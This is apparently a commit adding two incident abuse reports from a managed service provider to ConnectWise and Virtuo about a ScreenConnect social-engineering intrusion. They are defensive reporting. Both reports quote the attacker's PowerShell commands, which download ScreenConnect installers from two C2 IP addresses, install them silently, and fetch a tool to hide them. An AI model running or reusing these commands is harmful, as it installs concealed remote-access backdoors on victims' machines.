Session log: Dataforth security incident, MFA rollout, test datasheet investigation

- DF-JOEL2 compromised via ScreenConnect social engineering (Angel Raya)
- C2 IPs blocked, rogue clients removed, M365 sessions revoked, password reset
- IC3 complaint filed, abuse reports sent to Virtuo and ConnectWise
- Conditional Access policies deployed (MFA, block foreign, block legacy auth)
- 38 stale test station accounts deleted from Entra
- Test datasheet pipeline investigated - data exists in DB, export step broken
- TestDataSheetUploader source code extracted for analysis

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

clients/dataforth/docs/incident-2026-03-27-abuse-report-connectwise.md

@@ -0,0 +1,67 @@
+Subject: Abuse Report - ScreenConnect Cloud Instance Used for Unauthorized Access and C2 Deployment
+
+To: abuse@connectwise.com
+
+Dear ConnectWise Security/Abuse Team,
+
+We are reporting a ScreenConnect cloud instance being used to conduct unauthorized access attacks against our client's infrastructure.
+
+## Offending ScreenConnect Instance
+
+- **Relay hostname:** instance-wlb9ga-relay.screenconnect.com
+- **Operator alias:** Angel Raya
+- **ScreenConnect Client ID:** 0cad93610010625f
+- **Session GUID:** 8bb6c85a-6cab-46ab-8cad-26f6d2672a03
+- **Client Version:** 26.1.18.9566
+
+## Nature of Abuse
+
+On March 27, 2026, an individual operating under the name "Angel Raya" used the above ScreenConnect cloud instance to gain unauthorized remote access to a victim workstation. Once connected, the operator used the ScreenConnect backstage shell to execute PowerShell commands that:
+
+1. Downloaded and silently installed two additional ScreenConnect clients from self-hosted C2 servers (80.76.49.18:8040 and 45.88.91.99:8040, both on AS399486 / Virtuo hosting)
+2. Downloaded a tool to hide the rogue installations from the Windows uninstall list
+3. Returned later through the self-hosted C2 backdoor under the session name "Administrator"
+
+## Attack Timeline (March 27, 2026)
+
+- **08:28** - ScreenConnect client (0cad93610010625f) installed from `C:\Users\jlohr\Downloads\ScreenConnect.ClientSetup.msi`
+- **08:29** - "Angel Raya" connected via instance-wlb9ga-relay.screenconnect.com
+- **08:29** - PowerShell commands executed to install two self-hosted ScreenConnect C2 backdoors
+- **08:31** - "Hide From Uninstall List" tool downloaded and extracted
+- **08:32** - Tool used to hide rogue ScreenConnect clients from Add/Remove Programs
+- **08:32** - "Angel Raya" disconnected
+
+## Commands Executed via Backstage Shell
+
+The following commands were found in the PowerShell terminal history on the victim machine:
+
+```
+powershell -Command "Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
+
+powershell -Command "Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
+
+Invoke-WebRequest -Uri "https://www.sordum.org/files/downloads.php?hide-from-uninstall-list" -OutFile "C:\Users\Public\Pictures\Backup.zip"
+```
+
+## Additional Context
+
+- The victim's Microsoft 365 account also showed successful unauthorized sign-ins from Istanbul, Turkey and Croydon, UK, along with sustained brute-force attempts from Germany and Luxembourg over the preceding week.
+- The self-hosted C2 ScreenConnect MSI packages have build dates of April 8, 2025, suggesting this operation has been active for approximately one year.
+- The victim was a departing employee (retiring March 31, 2026), which may have been a factor in targeting.
+
+## Requested Action
+
+1. Identify and suspend the ScreenConnect cloud account associated with instance-wlb9ga-relay.screenconnect.com
+2. Preserve all session logs, account registration information, and billing details for this instance
+3. Share any available information with law enforcement upon request
+
+This incident is being reported to the FBI IC3 and the hosting provider (Virtuo / AS399486).
+
+## Reporting Organization
+
+Arizona Computer Guru, LLC
+Managed Service Provider
+Phone: 520-304-8300
+Email: support@azcomputerguru.com
+
+Thank you for your prompt response.

clients/dataforth/docs/incident-2026-03-27-abuse-report-virtuo.md

@@ -0,0 +1,74 @@
+Subject: Abuse Report - Unauthorized Remote Access C2 Servers on 80.76.49.18 and 45.88.91.99
+
+To: abuses@virtuo.host
+CC: noc@virtuo.host
+
+Dear Virtuo Abuse Department,
+
+We are reporting two IP addresses on your network that are being used as command-and-control servers for unauthorized remote access attacks against our client's infrastructure.
+
+## Offending IPs
+
+- **80.76.49.18** (port 8041)
+- **45.88.91.99** (port 8041)
+
+Both IPs are on AS399486 (12651980 CANADA INC. / Virtuo).
+
+## Nature of Abuse
+
+These servers are hosting self-hosted ConnectWise ScreenConnect (remote access) instances on port 8040/8041, used to maintain persistent unauthorized access to victim machines. This is not a legitimate use of remote support software -- the clients are deployed silently via PowerShell commands executed during an active social engineering attack, then hidden from the Windows uninstall list using third-party tools.
+
+## Evidence
+
+### Attack Timeline (March 27, 2026 - UTC-7)
+
+1. At approximately 08:28, an attacker using the alias "Angel Raya" connected to the victim machine via a ScreenConnect cloud relay (instance-wlb9ga-relay.screenconnect.com).
+
+2. At 08:29, the following commands were executed in a PowerShell session on the victim machine to download and silently install ScreenConnect clients from your infrastructure:
+
+```
+powershell -Command "Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
+
+powershell -Command "Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
+```
+
+3. The attacker then downloaded a tool from sordum.org ("Hide From Uninstall List") to conceal the rogue ScreenConnect installations from Windows Add/Remove Programs.
+
+4. At 11:55, a session identified as "Administrator" connected back through the 80.76.49.18 C2 server, confirming the backdoor was actively used for return access.
+
+### ScreenConnect Service Details
+
+**Client connecting to 80.76.49.18:**
+- Service Name: ScreenConnect Client (0dfe1abae029411c)
+- Session GUID: eec1c861-ec30-4c7a-a8e7-cc8a1dbd5a56
+- Relay: 80.76.49.18:8041
+- Version: 25.2.4.9229
+
+**Client connecting to 45.88.91.99:**
+- Service Name: ScreenConnect Client (a897d9a21259d116)
+- Session GUID: 406bd356-cde4-4738-a22f-f776c8097686
+- Relay: 45.88.91.99:8041
+- Version: 25.2.4.9229
+
+### Additional Context
+
+- The ScreenConnect MSI packages have file timestamps from April 8, 2025, indicating this infrastructure has been used for attacks for approximately one year.
+- The victim's Microsoft 365 account was also subject to brute-force login attempts from IPs in Germany (45.86.202.x), Luxembourg, and Turkey during the same period, with a successful unauthorized sign-in from Istanbul, Turkey (91.93.232.236) on the same day.
+
+## Requested Action
+
+We request that you:
+1. Immediately suspend the servers at 80.76.49.18 and 45.88.91.99
+2. Preserve all logs related to these IPs for law enforcement
+3. Provide any subscriber/billing information to law enforcement upon request
+
+This incident is being reported to the FBI Internet Crime Complaint Center (IC3) and ConnectWise.
+
+## Reporting Organization
+
+Arizona Computer Guru, LLC
+Managed Service Provider
+Phone: 520-304-8300
+Email: support@azcomputerguru.com
+
+Thank you for your prompt attention to this matter.